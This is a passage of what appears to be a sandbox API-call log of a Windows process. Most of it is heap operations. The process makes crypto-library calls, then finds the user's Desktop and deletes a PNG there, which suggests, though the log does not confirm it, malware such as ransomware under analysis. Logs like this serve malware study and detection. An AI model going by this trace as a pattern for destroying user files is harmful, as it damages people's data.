(in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543f0 | out: hHeap=0x970000) returned 1 [0214.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0214.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50908 [0214.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78bb8 [0214.951] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0214.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0214.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0214.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0214.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0214.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78bb8 | out: hHeap=0x970000) returned 1 [0214.952] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0214.952] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0214.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0214.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0214.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0214.952] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0214.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0214.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0214.952] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0214.954] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0214.954] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0214.954] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0214.954] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0214.954] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0214.954] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0214.954] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0214.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0214.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0214.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0214.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0214.954] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0214.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0214.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0214.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0214.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0214.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0214.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0214.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0214.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0214.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0214.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0214.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0214.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0214.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0214.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0214.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0214.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0214.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0214.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0214.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0214.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0214.956] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0214.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69ac8 [0214.956] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x2e69ac8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0214.956] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0214.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54260 [0214.956] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0214.956] GetProcAddress (hModule=0x756e0000, lpProcName="CryptReleaseContext") returned 0x756ffbc0 [0214.956] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54260 | out: hHeap=0x970000) returned 1 [0214.957] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0214.957] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0214.957] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0214.957] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0214.957] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0214.957] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0214.957] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0214.957] CryptReleaseContext (hProv=0xa5f958, dwFlags=0x0) returned 1 [0214.957] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0214.957] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50998 [0214.957] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0214.957] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0214.957] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0214.957] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0214.957] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0214.958] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0214.958] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0214.958] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0214.958] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0214.958] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0214.958] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0214.958] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0214.958] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0214.958] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0214.958] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0214.958] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0214.958] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0214.958] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0214.958] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0214.958] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0214.958] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0214.958] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0214.958] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0214.958] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0214.958] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0214.958] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0214.959] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0214.959] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0214.959] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0214.959] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0214.959] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0214.959] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0214.959] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0214.959] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0214.959] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0214.959] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0214.959] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0214.959] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0214.959] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543a0 | out: hHeap=0x970000) returned 1 [0214.959] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0214.959] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0215.029] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0215.029] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0215.029] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0215.029] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0215.029] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0215.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0215.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0215.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e801e8 [0215.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0215.030] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0215.030] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e801e8 | out: hHeap=0x970000) returned 1 [0215.030] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0215.030] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507a0 [0215.030] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0215.030] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0215.030] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0215.030] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0215.030] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0215.030] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0215.030] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0215.030] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0215.030] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0215.030] FreeLibrary (hLibModule=0x756e0000) returned 1 [0215.030] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0215.030] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0215.030] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.030] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0215.030] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.030] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0215.030] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0215.031] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0215.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0215.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0215.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69888 [0215.031] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0215.031] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69888 | out: hHeap=0x970000) returned 1 [0215.031] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0215.031] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0215.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0215.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e504d0 [0215.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e503f8 [0215.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50440 [0215.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0215.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50578 [0215.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544b8 [0215.031] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0215.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e505f0 [0215.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0215.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0215.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0215.031] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0215.032] CloseHandle (hObject=0x2d0) returned 1 [0215.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0215.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0215.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04008 | out: hHeap=0x970000) returned 1 [0215.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0215.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0215.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0215.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0215.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0215.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0215.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0215.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0215.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0215.093] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0215.093] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544b8 | out: hHeap=0x970000) returned 1 [0215.093] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0215.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0215.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0215.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0215.093] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0215.093] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0215.093] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0215.093] CloseHandle (hObject=0x2a0) returned 1 [0215.099] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.099] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0215.099] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0215.099] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0215.099] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0215.102] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0215.102] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e539b0 [0215.102] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0215.102] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0215.102] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf560 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0215.102] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53860 [0215.102] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fca8 [0215.102] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0215.102] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0215.102] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0215.102] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53878 [0215.103] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e58910 [0215.103] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/yW8EXq3.png", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\yW8EXq3.png", lpFilePart=0x8cedf4*="yW8EXq3.png") returned 0x23 [0215.103] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\yW8EXq3.png" (normalized: "c:\\users\\fd1hvy\\desktop\\yw8exq3.png")) returned 0x20 [0215.103] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\yW8EXq3.png", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x450721d0, ftCreationTime.dwHighDateTime=0x1d5e721, ftLastAccessTime.dwLowDateTime=0x4c7382b0, ftLastAccessTime.dwHighDateTime=0x1d5ea41, ftLastWriteTime.dwLowDateTime=0x4c7382b0, ftLastWriteTime.dwHighDateTime=0x1d5ea41, nFileSizeHigh=0x0, nFileSizeLow=0xb494, dwReserved0=0xfffffffc, dwReserved1=0x8cf25c, cFileName="yW8EXq3.png", cAlternateFileName="")) returned 0xa87310 [0215.104] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\yW8EXq3.png" (normalized: "c:\\users\\fd1hvy\\desktop\\yw8exq3.png")) returned 1 [0215.123] FindNextFileW (in: hFindFile=0xa87310, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x450721d0, ftCreationTime.dwHighDateTime=0x1d5e721, ftLastAccessTime.dwLowDateTime=0x4c7382b0, ftLastAccessTime.dwHighDateTime=0x1d5ea41, ftLastWriteTime.dwLowDateTime=0x4c7382b0, ftLastWriteTime.dwHighDateTime=0x1d5ea41, nFileSizeHigh=0x0, nFileSizeLow=0xb494, dwReserved0=0xfffffffc, dwReserved1=0x8cf25c, cFileName="yW8EXq3.png", cAlternateFileName="")) returned 0 [0215.123] FindClose (in: hFindFile=0xa87310 | out: hFindFile=0xa87310) returned 1 [0215.123] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0215.123] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0215.124] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53860 | out: hHeap=0x970000) returned 1 [0215.124] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53770 | out: hHeap=0x970000) returned 1 [0215.124] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e539b0 | out: hHeap=0x970000) returned 1 [0215.124] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0215.124] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e539b0 [0215.124] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0215.124] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0215.124] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf560 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0215.124] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53908 [0215.124] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e801e8 [0215.124] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0215.124] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0215.124] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a48 [0215.124] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0215.124] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e58910 [0215.124] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e801e8 | out: hHeap=0x970000) returned 1 [0215.124] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53770 | out: hHeap=0x970000) returned 1 [0215.149] 